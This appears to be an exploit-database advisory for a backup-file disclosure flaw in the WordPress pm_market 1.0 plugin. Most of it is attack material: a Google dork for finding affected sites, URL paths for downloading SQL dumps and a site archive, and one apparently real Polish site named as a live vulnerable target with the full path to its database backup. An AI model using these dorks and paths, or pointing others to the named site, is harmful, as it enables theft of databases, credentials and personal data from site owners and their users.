WordPress pm_market 1.0 Database Backup Disclosure

WordPress pm_market plugin version 1.0 suffers from a database backup disclosure vulnerability.


MD5 | 51bac4932b0cf408a89137f4250c99c8

#################################################################################################

# Exploit Title : WordPress pm_market Plugins 1.0 Database Backup
Information Disclosure Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 30/11/2018
# Vendor Homepage : wordpress.org ~ power.com.pl
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.0
# Google Dorks : inurl:''/wp-content/plugins/pm_market/backup/''
+ intext:Copyright A(c) Power Media S.A. site:pl
# Exploit Risk : Medium
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

# Admin Panel Login Path :

/wp-login.php

# Exploit :

/wp-content/plugins/pm_market/backup/....

/wp-content/plugins/pm_market/backup/[YEAR]-[MONTH]-[DAY]/pm_market.sql

/wp-content/plugins/pm_market/backup/2012-01-05/pm_market.sql

/wp-content/plugins/pm_market/backup/2012-01-05/wordpress.sql

/wp-content/plugins/pm_market/backup/2012-01-05/www.zip

#################################################################################################

# Example Vulnerable Site =>

[+]
klaster.kalisz.pl/wp-content/plugins/pm_market/backup/2012-01-05/pm_market.sql

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Related Posts